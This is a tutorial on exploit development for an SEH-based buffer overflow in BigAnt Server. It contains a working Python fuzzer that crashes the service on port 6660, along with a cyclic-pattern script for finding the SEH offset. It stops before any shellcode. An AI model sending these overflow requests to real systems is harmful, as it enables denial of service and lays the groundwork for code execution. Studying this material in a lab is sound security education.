BigAnt Server is built with Structured Exception Handling (SEH) and SafeSEH. In this tutorial I'm going to show you how to exploit this application.
Fuzzing :
#!/usr/bin/env python3
import socket

# BigAnt Server target (adjust to your lab)
target = "192.168.1.101"
target_port = 6660

# "USV " command followed by 2500 'A' (0x41) bytes, terminated with CRLF CRLF
buff = b"USV " + b"\x41" * 2500
buff += b"\r\n\r\n"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, target_port))
sock.sendall(buff)
print("Success....!!")
sock.close()
Run this fuzzer and watch what happens in OllyDbg.
EIP is not overwritten directly. The oversized buffer causes an access violation inside the vulnerable function before it ever returns, so the exception dispatcher takes over and walks the SEH chain, and our 'A' bytes have overwritten that chain. To see it, select View > SEH chain in OllyDbg. SafeSEH matters for the later step: the handler address we eventually place in the record must come from a module that was not compiled with SafeSEH, otherwise the dispatcher will refuse to call it.
Press Shift+F9 to pass the exception to the program; the dispatcher then jumps to the overwritten handler address, which puts our bytes into EIP.
In the figure above, EIP is now overwritten with 41414141, the 'A' bytes that came from the fuzzer.
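The all-'A' buffer proves the overwrite happened but not which of the 2500 bytes landed in the nSEH and handler fields. The usual next step is to resend the same USV request with a cyclic (non-repeating) pattern and map the dword the debugger shows back to an offset. The script below is an added example, not code from the original post: it re-implements the Metasploit pattern_create / pattern_offset logic in Python and assumes the same 192.168.1.101:6660 target as the fuzzer above.

```python
import socket
import string
import struct

# Assumed lab target, same values as the fuzzer (not part of the original post).
TARGET = "192.168.1.101"
TARGET_PORT = 6660


def cyclic_pattern(length):
    """Build a Metasploit-style cyclic pattern: each 3-byte chunk is an
    upper/lower/digit triple, so every 4-byte window is unique for the
    first 20280 bytes. Returns a str of exactly `length` characters."""
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(pattern, dword):
    """Given the 32-bit value the debugger shows in EIP (or in the nSEH /
    handler field of the SEH chain), find where those bytes sit in `pattern`.
    x86 is little-endian, so the register value is byte-reversed before
    searching. Returns -1 when the value does not occur in the pattern."""
    needle = struct.pack("<I", dword).decode("latin-1")
    return pattern.find(needle)


def build_usv_request(body):
    """Wrap a str or bytes body in the same 'USV ' command the fuzzer sends."""
    if isinstance(body, str):
        body = body.encode("latin-1")
    return b"USV " + body + b"\r\n\r\n"


def send_request(payload, host=TARGET, port=TARGET_PORT, timeout=5):
    """Deliver one request to the server (needs the lab target to be up)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)


if __name__ == "__main__":
    # Replace the all-'A' buffer with a unique pattern of the same length,
    # then read the dword in EIP / nSEH / SEH handler from OllyDbg and
    # feed it back into pattern_offset().
    pattern = cyclic_pattern(2500)
    send_request(build_usv_request(pattern))
    print("Sent %d-byte pattern; now call pattern_offset(pattern, 0x<value from EIP>)"
          % len(pattern))
```

After Shift+F9, the value in EIP is the handler field of the overwritten record; its offset from pattern_offset() is the SEH offset, and nSEH sits 4 bytes before it. With the original all-'A' buffer pattern_offset() can only report the first match (offset 0), which is exactly why a unique pattern is needed.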
To be continued... ^_^